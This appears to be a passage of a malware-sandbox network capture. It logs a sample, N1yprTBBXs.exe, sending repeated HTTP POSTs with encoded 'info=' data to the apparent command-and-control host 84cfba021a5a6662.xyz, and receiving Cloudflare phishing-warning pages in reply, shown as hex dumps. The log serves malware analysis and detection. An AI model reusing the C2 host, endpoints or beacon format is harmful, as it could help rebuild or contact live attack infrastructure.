38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:38:58.145667076 CET	624	OUT	POST /info_old/g HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 1393 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:58.201672077 CET	627	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d20309c657c3aa8033289bcf78fb7eb2f1611938338; expires=Sun, 28-Feb-21 16:38:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c2d860000722ded166000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wwZW7r1Jc28fPnL8KXVfjpY1Ziyt%2BVfRG01K4TjvhT5qwKsR7RJ21bq397U3d2CIwET%2BOZMYmtfYXfvyyTFQdNjTJZFM6R80dsGHyFuHHl4IPtLkQA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462f5af7b722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:38:58.209351063 CET	631	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:58.264574051 CET	633	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d20309c657c3aa8033289bcf78fb7eb2f1611938338; expires=Sun, 28-Feb-21 16:38:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c2dc70000722de513d000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=JdIGm0HRyN6TmoSouRicUz8GfAA2HWr7izc91aOmOjRxyh2jhFYR5yNkdtmWkFWvCuEMfAAsSdyFPwIzrFONpb2meMEyMMnX5uLHflgX%2Bpa5HkS2Rg%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462f60fc3722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
Jan 29, 2021 17:38:58.266551018 CET	637	OUT	GET /info_old/r HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:58.319027901 CET	639	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d20309c657c3aa8033289bcf78fb7eb2f1611938338; expires=Sun, 28-Feb-21 16:38:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c2e000000722de9acb000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3BF6MsVzUm%2BiKRPPF%2B4BTQEMKHBP5v0DntkQQxydAste4RKwERxEQTDedOV9mtMIEdcfBZu6ISIX5alRxSygxXrEAr2hXe7tbga46N4b4y81UJuBwA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619462f66fe9722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:39:15.366708040 CET	1191	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:39:15.638581038 CET	1191	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:15.951106071 CET	1192	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:16.560844898 CET	1193	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:17.779493093 CET	1211	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xy Data Raw: Data Ascii:
Jan 29, 2021 17:39:17.942154884 CET	1213	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:39:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dbcccb0326f30df5ee2ada287f6033e851611938357; expires=Sun, 28-Feb-21 16:39:17 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c7a910000722de2251000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5jwELGRBcFgHzEg%2FJqjKprpf%2F17zeJUpjwDtj4f7AAl9korLlxe%2BFfP3qD%2B0hhkFUSup%2BlKCwjgLkU2r5KVgB4uXMQI0pLdYEG0x9RKrvDOyLRSAWA%3D%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 619463705d70722d-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="view

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49722	104.21.23.16	80	C:\Users\user\Desktop\N1yprTBBXs.exe

Timestamp	kBytes transferred	Direction	Data
Jan 29, 2021 17:38:48.794128895 CET	264	OUT	POST /info_old/w HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 upgrade-insecure-requests: 1 Content-Length: 81 Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:48.865298986 CET	266	IN	HTTP/1.1 200 OK Date: Fri, 29 Jan 2021 16:38:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d8ac9d532fed68827556afccc307639011611938328; expires=Sun, 28-Feb-21 16:38:48 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 07f09c08fe00001feafe098000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Dl4Rc1p6KRg7Z6nRmR5OluCLpeK6Ba9C7APa3fSgd2LFvwnpp8H1kTEaMT2ZTS3jWsXjOSb8zKXZBkxwIKgMtMEnbdmJbdm5L7uJV9jNjL0VDx1NSg%3D%3D"}],"max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 619462bb39ec1fea-AMS Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 